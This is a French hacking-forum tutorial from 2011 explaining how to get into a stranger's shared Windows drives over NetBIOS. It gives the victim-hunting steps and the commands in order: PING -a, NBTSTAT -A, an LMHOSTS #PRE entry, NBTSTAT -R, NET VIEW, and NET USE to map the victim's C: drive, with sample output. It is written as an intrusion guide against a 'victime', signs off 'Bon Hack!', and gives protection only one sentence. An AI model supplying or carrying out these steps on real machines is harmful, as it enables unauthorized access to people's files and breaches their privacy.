FranceHack Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
L'exploit NETBIOS

 
Répondre au sujet    FranceHack Index du Forum » Hacking » Tutoriel Sujet précédent
Sujet suivant
L'exploit NETBIOS
Auteur Message
scorpionhack80
Invité

Hors ligne




Message L'exploit NETBIOS Répondre en citant
L'exploit NETBIOS 
 
 
Bonjour.tous d'abort il vous  faut ouvrire la console ms-dos allait dans demarrer rechercher les programmes est fichiers ,taper cmd puis cliquet sur la petit fenetre cmd,sela vous ouvre la console ms-dos. 


 
(tous les commandes ecrite en vert son a rentrer dans la console ms-dos.) Première chose, trouver l'IP. Là, rien de plus facile, le pirate repère l'IP ou l'adresse de la victime sur IRC par exemple. Si c'est l'IP numérique du type 255.255.255.255, pas de problème, si c'est en revanche une adresse du genre Mrxxx.no-ip.org, il fait : PING -a Mrxxx.no-ip.org et il aura son IP. Le processus est enclenché. 

Maintenant, le pirate doit obtenir le nom d'ordinateur de la personne dont il veut voir le disque dur. Pour cela, il y a la fonction NBTSTAT qui permet de voir l'état d'un adapteur réseau, et les infos le concernant.Le pirate tape donc (Dans Ms-Dos, il ouvre donc une fenêtre dos...) : NBTSTAT -A 127.127.127.127 (<<IP>NBTSTAT -A 194.114.95.141 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- MAURO <00> UNIQUE Registered MICA <00> GROUP Registered MAURO <03> UNIQUE Registered MAURO <20> UNIQUE Registered MICA <1E> GROUP Registered MAC Address = 44-45-53-54-00-00 (Si c'est écrit "HOST NOT FOUND", le pirate change de cible car celle-ci n'a pas NETBEUI d'installé.) Ce qui l'intéresse c'est les noms avec écrit UNIQUE à côté. Sa cible utilise forcément l'un de ces noms de machines en ce moment même ! ! Et c'est là qu'intervient LMHOSTS. Il édite LMHOSTS avec EDIT (dans une fenêtre Ms-Dos, il tape "edit") par exemple, et tape dans ce fichier : 194.114.95.141 MAURO #PRE Donc, l'IP, suivi du nom de machine, suivi de #PRE, pour indiquer que cette correspondance entre l'IP et le nom de machine doit être préchargé, pour ainsi passer AVANT la résolution DNS. Ensuite, il va réinitialiser son fichier LMHOSTS qu'il vient juste de sauvegarder. Pour cela, il tape : C:\>NBTSTAT -R Et si tout se passe bien, il voit : "Successful purge and preload of the NBT Remote Cache Name Table." Maintenant, il va s'occuper de chercher les ressources partagées par sa victime. Pour voir les ressources, il tape NET VIEW, VIEW comme "voir" en anglais, remarquez comme les choses sont bien faites. Donc, ça doit donner : NET VIEW \\MAURO (MAURO car là il passe sur le protocole NETBEUI, LMHOSTS va se charger de convertir le nom de machine en IP) Et hop, dans mon exemple, ça donne ça : C:\>NET VIEW \\MAURO Ressources partagées … \\MAURO Nom de partage Type Commentaire --------------------------------------------------- C Disque D Disque E Disque HP4L Impr. G Disque I Disque Exécution achevée. Le pirate sait alors que tous ces lecteurs sont partagés. Parfait pour lui, il va donc aller faire un tour sur le C: . La commande NET arrive à sa rescousse : C:\>NET USE \\MAURO\C K: Connect‚ … \\MAURO\C Et voilà…, le disque C de la cible est devenu le disque K du pirate. 










Ce grand classique ne marche vraiment pas souvent et pour s'en protéger il suffit juste de vérifier que son partage de fichiers n'est pas activé. 



Bon Hack!        
 
  



Dernière édition par scorpionhack80 le Jeu 19 Mai - 17:38 (2011); édité 2 fois
Dim 8 Mai - 15:02 (2011)
Publicité






Message Publicité
PublicitéSupprimer les publicités ?

Dim 8 Mai - 15:02 (2011)
hamster
Invité

Hors ligne




Message L'exploit NETBIOS Répondre en citant
merci beaucoup


Dim 8 Mai - 16:17 (2011)
Contenu Sponsorisé






Message L'exploit NETBIOS

Aujourd’hui à 01:13 (2016)
Montrer les messages depuis:    
Répondre au sujet    FranceHack Index du Forum » Hacking » Tutoriel Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 

Portail | Index | créer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.Traduction par : phpBB-fr.com